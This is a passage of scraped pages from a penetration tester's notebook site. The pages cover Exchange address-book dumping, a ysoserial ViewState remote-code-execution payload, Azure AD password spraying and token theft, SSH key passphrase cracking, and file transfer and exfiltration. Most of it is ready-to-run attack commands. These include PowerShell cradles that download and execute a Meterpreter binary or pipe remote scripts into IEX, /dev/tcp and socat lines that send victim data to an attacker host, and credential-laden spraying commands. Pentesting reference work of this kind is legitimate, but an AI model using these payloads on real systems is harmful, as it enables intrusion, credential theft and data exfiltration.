[+] AD: dc01.megacorp.com [+] OABUrl: https://mx.megacorp.com/OAB// Copy $ curl -k --ntlm -u 'MEGACORP\snovvcrash:Passw0rd!' https://mx.megacorp.com/OAB//oab.xml > oab.xml $ cat oab.xml | grep '.lzx' | grep data $ curl -k --ntlm -u 'MEGACORP\snovvcrash:Passw0rd!' https://mx.megacorp.com/OAB// > oab.lzx Copy $ git clone https://github.com/kyz/libmspack ~/tools/libmspack && cd ~/tools/libmspack/libmspack $ sudo apt install autoconf automake libtool -y $ ./rebuild.sh && ./configure && make && cd - Copy $ ~/tools/libmspack/libmspack/examples/oabextract oab.lzx oab.txt $ strings oab.txt | egrep -o "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}" | sort -u > emails.txt Copy $ git clone https://github.com/snovvcrash/peas ~/tools/peas-m && cd ~/tools/peas-m $ python3 -m virtualenv --python=/usr/bin/python venv && source ./venv/bin/activate (venv) $ pip install --upgrade 'setuptools<45.0.0' (venv) $ pip install -r requirements.txt Copy $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --check $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --list-unc='\\DC01' $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --list-unc='\\DC01\SYSVOL\megacorp.com' $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --dl-unc='\\DC01\share\file.txt' $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --dl-unc='\\DC01\share\file.txt' -o file.txt $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --crawl-unc='\\DC01\share\' [--pattern xml,ini] [--download] $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --brute-unc [--prefix srv] Copy $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --crawl-unc='\\DC01\SYSVOL\megacorp.com\' --download Copy $ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i -e password -e pass $ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i $ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i Copy $ python -m peas --brute-unc -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com [--prefix srv] Copy Get ViewStateUserKey: Browser > F12 > Storage > ASP.NET_SessionId Get ViewStateGenerator: Browser > F12 > Console > document.getElementById("__VIEWSTATEGENERATOR").value PS > [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$name = hostname;nslookup "$name.0000000000ffffffffff.d.zhack.ca"')) PS > .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -exec bypass -enc " --validationalg "SHA1" --validationkey "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --viewstateuserkey "" --generator "" --islegacy --isdebug https://mx.megacorp.com/ecp/default.aspx?__VIEWSTATEGENERATOR=&__VIEWSTATE= Copy $ exchanger.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -debug nspi list-tables -count Copy $ exchanger.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -debug nspi dump-tables -guid 00ff00ff-00ff-00ff-00ff-00ff00ff00ff -lookup-type EXTENDED -output-file gal.txt $ cat gal.txt | grep 'mail,' | sort -u | awk -F' ' '{print $3}' > emails.txt Copy PS > (Get-ADuser -Identity snovvcrash).ObjectGUID $ exchanger.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -debug nspi guid-known -guid 00ff00ff-00ff-00ff-00ff-00ff00ff00ff -lookup-type FULL Copy $ exchanger.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -debug nspi dnt-lookup -lookup-type EXTENDED -start-dnt 0 -stop-dnt 500000 -output-file dnt-dump.txt --- # FireBird | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/firebird.md) . * [https://www.infosecmatter.com/firebird-database-exploitation/](https://www.infosecmatter.com/firebird-database-exploitation/) Last updated 4 years ago --- # Azure AD | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad.md) . * [https://bhavsec.com/posts/intro-to-azure-pentesting/](https://bhavsec.com/posts/intro-to-azure-pentesting/) * [https://sofblocks.github.io/azure-cloud-pentesting/](https://sofblocks.github.io/azure-cloud-pentesting/) * [https://blog.xpnsec.com/azuread-connect-for-redteam/](https://blog.xpnsec.com/azuread-connect-for-redteam/) * [\[PDF\] Dumping NTHashes from Azure AD (Dr Nestori Syynimaa, @DrAzureAD)](https://troopers.de/downloads/troopers23/TR23_DumpingNTHashesfromAzureAD.pdf) [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#osint) OSINT ---------------------------------------------------------------------------- * [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/) * [https://aadinternals.com/osint/](https://aadinternals.com/osint/) OpenID configuration: Copy $ curl -s https://login.microsoftonline.com//v2.0/.well-known/openid-configuration | jq [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#password-spray) Password Spray ---------------------------------------------------------------------------------------------- Using [o365spray](https://github.com/0xZDH/o365spray) (random user agents [here](https://iplogger.org/ru/useragents/) ): Copy $ pipx install -f "git+https://github.com/0xZDH/o365spray.git" $ o365spray --validate -d megacorp.cloud $ o365spray --enum -d megacorp.cloud -u snovvcrash $ o365spray --enum -d megacorp.cloud -U names.txt $ o365spray --spray -d megacorp.cloud -U names.txt -p 'Passw0rd!' --sleep 5 --rate 1 --useragents ua.txt [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#enumeration) Enumeration ---------------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#tools) Tools #### [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#roadrecon) ROADrecon * [https://github.com/dirkjanm/ROADtools](https://github.com/dirkjanm/ROADtools?tab=readme-ov-file#using-roadrecon) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#azurehound) AzureHound * [https://github.com/BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound/releases/latest) * [https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html](https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html#dealing-with-multi-factor-auth-and-conditional-access-policies) Get the `device_code`: Get the `refresh_token`: Collect data providing the `refresh_token`: [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#mfa-bypass) MFA Bypass -------------------------------------------------------------------------------------- * [https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass#office365-client-apps) * [https://www.pentestpartners.com/security-blog/bypassing-mfa-on-microsoft-azure-entra-id/](https://www.pentestpartners.com/security-blog/bypassing-mfa-on-microsoft-azure-entra-id/) Check if MFA is forcefully enabled via [well-known client GUIDs](https://github.com/dirkjanm/ROADtools/blob/6e7ac2d1ea5805d2e9a1a14fe1bf2bd05b45b891/roadlib/roadtools/roadlib/constants.py#L14) : ### [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#aad.brokerplugin) AAD.BrokerPlugin * [https://habr.com/ru/articles/688426/](https://habr.com/ru/articles/688426/) Last updated 1 year ago * [OSINT](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#osint) * [Password Spray](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#password-spray) * [Enumeration](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#enumeration) * [Tools](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#tools) * [MFA Bypass](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#mfa-bypass) * [AAD.BrokerPlugin](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad#aad.brokerplugin) Copy $ roadrecon auth --device-code [-ua ''] $ roadrecon gather [-d megacorp.db] [-ua ''] $ roadrecon gui [-d megacorp.db] Copy $body = @{ "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" "resource" = "https://graph.microsoft.com" } $UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" $Headers = @{} $Headers["User-Agent"] = $UserAgent $authResponse = Invoke-RestMethod ` -UseBasicParsing ` -Method Post ` -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" ` -Headers $Headers ` -Body $body $authResponse Copy $body = @{ "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" "grant_type" = "urn:ietf:params:oauth:grant-type:device_code" "code" = $authResponse.device_code } $tokens = Invoke-RestMethod ` -UseBasicParsing ` -Method Post ` -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" ` -Headers $Headers ` -Body $body $tokens Copy $ eget -qs linux/amd64 "BloodHoundAD/AzureHound" --to ~/tools/BloodHound $ ~/tools/BloodHound/azurehound -r "" list --tenant megacorp.cloud --json -o azure_megacorp.cloud.json Copy $ proxy roadrecon auth -u snovvcrash@megacorp.cloud -p 'Passw0rd!' -r https://outlook.office.com/ -c 1b730954-1685-4b74-9bfd-dac224a7b894 --tokens-stdout Copy PS > ls C:\Users\\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\* --- # SSH | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/ssh.md) . * [https://blog.lexfo.fr/sshimpanzee.html](https://blog.lexfo.fr/sshimpanzee.html) * [https://github.com/lexfo/sshimpanzee](https://github.com/lexfo/sshimpanzee) * [https://github.com/ssh-mitm/ssh-mitm](https://github.com/ssh-mitm/ssh-mitm) [](https://ppn.snovvcra.sh/pentest/infrastructure/ssh#portable-clients) Portable Clients --------------------------------------------------------------------------------------------- * [https://github.com/xct/winssh](https://github.com/xct/winssh) * [https://github.com/NHAS/reverse\_ssh](https://github.com/NHAS/reverse_ssh) [](https://ppn.snovvcra.sh/pentest/infrastructure/ssh#quicky-offline-private-key-crack) Quicky Offline Private Key Crack ----------------------------------------------------------------------------------------------------------------------------- * [https://security.stackexchange.com/a/191122](https://security.stackexchange.com/a/191122) PEM/OpenSSH PuTTY PPK pem-crack.sh Copy #!/usr/bin/env bash # pem-crack.sh passwords.txt root.protected root.priv echo "Wordlist : $1" echo "PEM key : $2" echo "New PEM key : $3" cp "$2" "$3" && chmod 600 "$3" while read -r line do err=$( (ssh-keygen -p -P "$line" -N '' -f "$3") 2>&1 ) if [[ ! $err = *"incorrect passphrase"* ]]; then echo "Passphrase : $line" echo "$err" break fi done < "$1" ppk-crack.sh Copy #!/usr/bin/env bash # sudo apt install putty-tools -y # ppk-crack.sh passwords.txt root.ppk.protected root.priv echo "Wordlist : $1" echo "PEM key : $2" echo "New PEM key : $3" touch /tmp/empty while read -r line do echo "$line" > /tmp/w err=$( (puttygen "$2" -P -o "$3" --old-passphrase /tmp/w --new-passphrase /tmp/empty) 2>&1 ) if [[ ! $err = *"wrong passphrase"* ]]; then echo "Passphrase : $line" echo "$err" puttygen "$3" -O private-openssh -o "$3" break fi done < $1 rm -f /tmp/w /tmp/empty Last updated 1 year ago * [Portable Clients](https://ppn.snovvcra.sh/pentest/infrastructure/ssh#portable-clients) * [Quicky Offline Private Key Crack](https://ppn.snovvcra.sh/pentest/infrastructure/ssh#quicky-offline-private-key-crack) --- # DBMS | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/dbms.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms#tools) Tools ------------------------------------------------------------------------ ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms#dbeaver) DBeaver * [DBeaver Community](https://dbeaver.io/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms#dbvisualizer) DbVisualizer * [DbVisualizer](https://www.dbvis.com/) Last updated 4 years ago * [Tools](https://ppn.snovvcra.sh/pentest/infrastructure/dbms#tools) * [DBeaver](https://ppn.snovvcra.sh/pentest/infrastructure/dbms#dbeaver) * [DbVisualizer](https://ppn.snovvcra.sh/pentest/infrastructure/dbms#dbvisualizer) --- # SQLite | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/sqlite.md) . * [https://xakep.ru/2010/11/03/53551/](https://xakep.ru/2010/11/03/53551/) Copy SELECT tbl_name FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%'; SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='secret_database'; SELECT username,password FROM secret_database; Last updated 4 years ago --- # Networks | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks.md) . * [https://github.com/frostbits-security/MITM-cheatsheet](https://github.com/frostbits-security/MITM-cheatsheet) * [https://xakep.ru/2021/08/25/stp-yersinia/](https://xakep.ru/2021/08/25/stp-yersinia/) * [https://xakep.ru/author/necreas1ng/](https://xakep.ru/author/necreas1ng/) * [https://habr.com/ru/users/Necreas1ng/](https://habr.com/ru/users/Necreas1ng/) [](https://ppn.snovvcra.sh/pentest/infrastructure/networks#nat-hole-punching) NAT Hole Punching ---------------------------------------------------------------------------------------------------- * [https://habr.com/ru/articles/763164/](https://habr.com/ru/articles/763164/) * [https://github.com/dwoz/python-nat-hole-punching](https://github.com/dwoz/python-nat-hole-punching) * [https://github.com/penumbra23/peerko](https://github.com/penumbra23/peerko) Last updated 2 years ago --- # File Transfer | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer.md) . * [https://blog.ropnop.com/transferring-files-from-kali-to-windows/](https://blog.ropnop.com/transferring-files-from-kali-to-windows/) * [https://github.com/evilmog/evilmog/wiki/DNS-Download-Cradle](https://github.com/evilmog/evilmog/wiki/DNS-Download-Cradle) [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#base64) Base64 ----------------------------------------------------------------------------------- String to base64 and POST with PowerShell: Copy PS > $str = cmd /c net user /domain PS > $base64str = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) PS > IWR -Uri http://127.0.0.1/msg -Method POST -Body $base64str File to base64 with `certutil`: Copy Cmd > certutil -encode C:\Windows\Temp\encoded.b64 Cmd > type C:\Windows\Temp\encoded.b64 Base64 file transfer from Linux to Windows: Copy $ base64 -w0 tunnel.aspx; echo ...BASE64_CONTENTS... PS > Add-Content -Encoding UTF8 tunnel.b64 "" -NoNewLine PS > $data = Get-Content -Raw tunnel.b64 PS > [IO.File]::WriteAllBytes("C:\inetpub\wwwroot\uploads\tunnel.aspx", [Convert]::FromBase64String($data)) Print file by base64 chunks in console: Copy $ python -c "import base64;f=open('data.bin','rb');[print(base64.b64encode(c).decode()) for c in iter(lambda: f.read(4096), b'')]" [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#hex) Hex ----------------------------------------------------------------------------- Compress a binary file and transfer it to Windows by copy-pasting commands into the console: [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#powershell) PowerShell ------------------------------------------------------------------------------------------- PowerShell upload file: PowerShell auto detect proxy, download file from remote HTTP server and run it: PowerShell manually set proxy and upload file to remote HTTP server: Another proxy-aware download cradle: Quicky connection tests for HTTP/HTTPS: Through a negotiate proxy with creds (can also use [proxy-negotiate](https://github.com/COUR4G3/proxy-negotiate) ): [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#dev-tcp) /dev/tcp -------------------------------------------------------------------------------------- Attacker is the sender: Victim is the sender: [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#socat) socat --------------------------------------------------------------------------------- Recipient (Attacker): Sender (Victim): [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#ssh) SSH ----------------------------------------------------------------------------- SSH + cat/type: [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#smb) SMB ----------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#smbserver.py) smbserver.py Start SMB server: Mount SMB in Windows with `net use`: Mount SMB in Windows with `New-PSDrive`: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#net-share) net share [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#ftp) FTP ----------------------------------------------------------------------------- [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#tftp) TFTP ------------------------------------------------------------------------------- Send `file.exe` from Windows to Linux (TFTP client must be [enabled](https://teckangaroo.com/enable-tftp-windows-10/) on Windows): [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#icmp) ICMP ------------------------------------------------------------------------------- * [https://github.com/icyguider/ICMP-TransferTools](https://github.com/icyguider/ICMP-TransferTools) * [https://snovvcrash.github.io/2019/04/05/htb-mischief.html](https://snovvcrash.github.io/2019/04/05/htb-mischief.html#icmpshellpy) [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#exfiltration-infiltration) Exfiltration / Infiltration --------------------------------------------------------------------------------------------------------------------------- * [https://xakep.ru/2022/09/22/infilltration-and-exfiltration/](https://xakep.ru/2022/09/22/infilltration-and-exfiltration/) * [https://github.com/s0i37/exfiltrate](https://github.com/s0i37/exfiltrate) [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#tools) Tools --------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#http-server) http-server * [https://github.com/http-party/http-server](https://github.com/http-party/http-server) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#goshs) goshs * [https://github.com/patrickhener/goshs](https://github.com/patrickhener/goshs) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#simplehttpserver) simplehttpserver * [https://github.com/projectdiscovery/simplehttpserver](https://github.com/projectdiscovery/simplehttpserver) Last updated 8 months ago * [Base64](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#base64) * [Hex](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#hex) * [PowerShell](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#powershell) * [/dev/tcp](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#dev-tcp) * [socat](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#socat) * [SSH](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#ssh) * [SMB](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#smb) * [smbserver.py](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#smbserver.py) * [net share](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#net-share) * [FTP](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#ftp) * [TFTP](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#tftp) * [ICMP](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#icmp) * [Exfiltration / Infiltration](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#exfiltration-infiltration) * [Tools](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#tools) * [http-server](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#http-server) * [goshs](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#goshs) * [simplehttpserver](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer#simplehttpserver) Copy $ upx -9 file.exe $ exe2hex -x file.exe -p file.cmd $ cat file.cmd | xclip -i -sel c Copy PS > (New-Object Net.WebClient).UploadFile("http://10.10.13.37/file.txt", "file.txt") Copy $proxyAddr=(Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer;$proxy=New-Object System.Net.WebProxy;$proxy.Address=$proxyAddr;$proxy.UseDefaultCredentials=$true;$client=New-Object System.Net.WebClient;$client.Proxy=$proxy;$client.DownloadFile("http://10.10.13.37/met.exe","$env:userprofile\music\met.exe");$exec=New-Object -com shell.application;$exec.shellexecute("$env:userprofile\music\met.exe") Copy $client=New-Object System.Net.WebClient;$proxy=New-Object System.Net.WebProxy("http://proxy.megacorp.local:3128",$true);$creds=New-Object Net.NetworkCredential("snovvcrash","Passw0rd!","megacorp.local");$creds=$creds.GetCredential("http://proxy.megacorp.local","3128","KERBEROS");$proxy.Credentials=$creds;$client.Proxy=$proxy;$client.UploadFile("http://10.10.13.37/results.txt","results.txt") Copy New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null $keys = Get-ChildItem "HKU:\" -ErrorAction SilentlyContinue ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start=$key.Name.Substring(10);break}} $proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer [System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://$proxyAddr") $wc = New-Object System.Net.WebClient $wc.DownloadString("http://10.10.13.37/test.txt") | IEX Remove-PSDrive -Name HKU -Force Copy # HTTP PS > IWR -UseBasicParsing -Uri http://www.msftconnecttest.com/connecttest.txt -UserAgent "Microsoft NCSI" # HTTPS PS > [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 PS > [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} PS > [System.Net.ServicePointManager]::Expect100Continue = {$false} PS > (IWR -UseBasicParsing -Uri https://www.microsoft.com/en-us/microsoft-365 -UserAgent "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko").RawContentLength Copy $ KRB5CCNAME=user.ccache curl -v -sSL -k -A 'Microsoft NCSI' --proxy http://gate01.megacorp.local:8080 [--proxy-user 'megacorp.local\user:Passw0rd!'] [--proxy-ntlm] --proxy-negotiate http://www.msftncsi.com/ncsi.txt Copy # Sender: root@kali:~$ tar -zcvf folder.tar.gz folder root@kali:~$ nc -w3 -lvnp 1234 < folder.tar.gz # Recipient: www-data@victim:~$ bash -c 'cat < /dev/tcp/127.0.0.1/1234 > .folder.tar.gz' www-data@victim:~$ tar -zxvf .folder.tar.gz Copy # Recipient: root@kali:~$ nc -w3 -lvnp 1234 > file.txt # Sender: www-data@victim:~$ bash -c 'cat < file.txt > /dev/tcp/127.0.0.1/1234' Copy $ socat TCP-LISTEN:1337 OPEN:data.tar,create,append Copy $ tar cf - /dev/shm/data | socat TCP:10.10.13.37:1337 - Copy $ ssh root@192.168.1.11 'type "C:\Windows\Temp\data.bin"' | pv > /tmp/data.bin Copy $ smbserver.py -smb2support share `pwd` Copy $ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd` Cmd > net use Z: \\10.10.13.37\share Cmd > net use Z: \\10.10.13.37\share /u:snovvcrash 'Passw0rd!' Copy $ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd` PS > $pass = 'Passw0rd!' | ConvertTo-SecureString -AsPlainText -Force PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $pass) Or PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force)) PS > New-PSDrive -Name Z -Root \\10.10.13.37\share -Credential $cred -PSProvider FileSystem PS > cd Z: Copy Cmd > net share pentest=c:\smb_pentest /GRANT:"Anonymous Logon,FULL" /GRANT:"Everyone,FULL" Or Cmd > net share pentest=c:\smb_pentest /GRANT:"Administrator,FULL" Cmd > net share pentest /delete Copy $ python -m pip install pyftpdlib $ python -m pyftpdlib -Dwp 2121 Cmd > cd C:\Windows\System32\spool\drivers\color Cmd > echo 'open 127.0.0.1 2121' > ftp.txt Cmd > echo 'user anonymous' >> ftp.txt Cmd > echo 'anonymous' >> ftp.txt Cmd > echo 'binary' >> ftp.txt Cmd > echo 'put file.bin' >> ftp.txt Cmd > echo 'bye' >> ftp.txt Cmd > ftp -v -n -s:ftp.txt Copy $ sudo atftpd --daemon --bind 10.10.13.37 --port 69 ./tftp Cmd > tftp -i 10.10.13.37 put file.exe $ sudo pkill atftpd Copy $ sudo apt install npm -y $ sudo npm install http-server -g $ sudo http-server -d false -p 443 -S -C /etc/letsencrypt/live/example.com/cert.pem -K /etc/letsencrypt/live/example.com/privkey.pem --log-ip | tee http-server.log Copy $ eget -qs linux/amd64 "patrickhener/goshs" --to ~/tools/goshs $ sudo ~/tools/goshs/goshs -ro -si -p 443 -s -sc /etc/letsencrypt/live/example.com/cert.pem -sk /etc/letsencrypt/live/example.com/privkey.pem -V | tee goshs.log Copy $ eget -qs linux/amd64 "projectdiscovery/simplehttpserver" --to ~/tools/pd $ sudo ~/tools/pd/simplehttpserver -listen 10.10.13.37:1337 -path `pwd` -upload -https -cert /etc/letsencrypt/live/example.com/fullchain.pem -key /etc/letsencrypt/live/example.com/privkey.pem -domain example.com -basic-auth 'snovvcrash:Passw0rd!' -max-file-size 100 --- # NAC Bypass | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/nac-bypass.md) . * [https://luemmelsec.github.io/I-got-99-problems-but-my-NAC-aint-one/](https://luemmelsec.github.io/I-got-99-problems-but-my-NAC-aint-one/) * [https://www.thehacker.recipes/physical/networking/network-access-control](https://www.thehacker.recipes/physical/networking/network-access-control) * [https://habr.com/ru/company/jetinfosystems/blog/564238/](https://habr.com/ru/company/jetinfosystems/blog/564238/) [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/nac-bypass#tools) Tools --------------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/nac-bypass#fenrir) FENRIR * [https://github.com/Orange-Cyberdefense/fenrir-ocd](https://github.com/Orange-Cyberdefense/fenrir-ocd) * [\[PDF\] 802.1x NAC & BYPASS TECHNIQUES (Hack in Paris 2017, Valérian LEGRAND)](https://hackinparis.com/data/slides/2017/2017_Legrand_Valerian_802.1x_Network_Access_Control_and_Bypass_Techniques.pdf) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/nac-bypass#nackered-and-nac_bypass) NACKered & nac\_bypass * [https://github.com/p292/NACKered](https://github.com/p292/NACKered) * [https://github.com/scipag/nac\_bypass](https://github.com/scipag/nac_bypass) * [https://github.com/snovvcrash/nac\_bypass](https://github.com/snovvcrash/nac_bypass) Set up the bridge (`eth0` is connected to the switch, `eth1` is connected to the authenticated client): Check iptables rules: Reset all the changes (bridge interface and iptables rules): Last updated 3 years ago * [Tools](https://ppn.snovvcra.sh/pentest/infrastructure/networks/nac-bypass#tools) * [FENRIR](https://ppn.snovvcra.sh/pentest/infrastructure/networks/nac-bypass#fenrir) * [NACKered & nac\_bypass](https://ppn.snovvcra.sh/pentest/infrastructure/networks/nac-bypass#nackered-and-nac_bypass) Copy $ sudo ./nac_bypass_setup.sh -1 eth0 -2 eth1 [-S] [-R] Copy $ sudo iptables -t nat -L Copy $ sudo ./nac_bypass_setup.sh -r --- # SIP / VoIP | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sip-voip.md) . * [https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4) * [https://www.hackingarticles.in/penetration-testing-on-voip-asterisk-server-part-2/](https://www.hackingarticles.in/penetration-testing-on-voip-asterisk-server-part-2/) [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sip-voip#cisco-ip-phones) Cisco IP Phones --------------------------------------------------------------------------------------------------------- * [https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/](https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/) * [https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/](https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/) * [https://github.com/n00py/CUCMe/blob/main/cucme.sh](https://github.com/n00py/CUCMe/blob/main/cucme.sh) * [https://github.com/trustedsec/SeeYouCM-Thief](https://github.com/trustedsec/SeeYouCM-Thief) * [https://github.com/llt4l/iCULeak.py](https://github.com/llt4l/iCULeak.py) * [https://github.com/Bond-o/vnum](https://github.com/Bond-o/vnum) Scrap Cisco IP Phone web interfaces by IPs to get the corresponding host names: Copy $ for i in `cat phones_ip.txt`; do curl -s http://$i | grep -oP 'SEP[A-Z0-9]+' | uniq | tee -a phones.txt; done Enumerate usernames on a Cisco CUCM server: Copy $ bash cucme.sh CUCM01.megacorp.local Or $ python3 thief.py -H CUCM01.megacorp.local --userenum Or $ curl -sk 